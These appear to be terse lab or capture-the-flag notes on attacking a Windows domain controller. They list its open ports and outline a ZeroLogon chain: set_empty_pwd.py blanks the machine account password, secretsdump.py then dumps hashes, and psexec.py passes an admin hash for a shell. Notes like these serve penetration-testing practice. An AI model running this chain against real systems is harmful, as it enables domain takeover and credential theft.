53 - domain 80 - IIS httpd 10.0 88 - Kerberos 135 - msrpc 139 -netbios 389 - ldap 445 - ds
HOST WINSERVER
ZeroLogon First user set_empty_pwd.py (zerologon-master) with set_empty pwd.py HOSTNAME IP If successful - secretsdump.py DOMAIN/HOST$@IP empty pass Once you get adminβ hash β psexec.py accname@IP -hashes hashofacc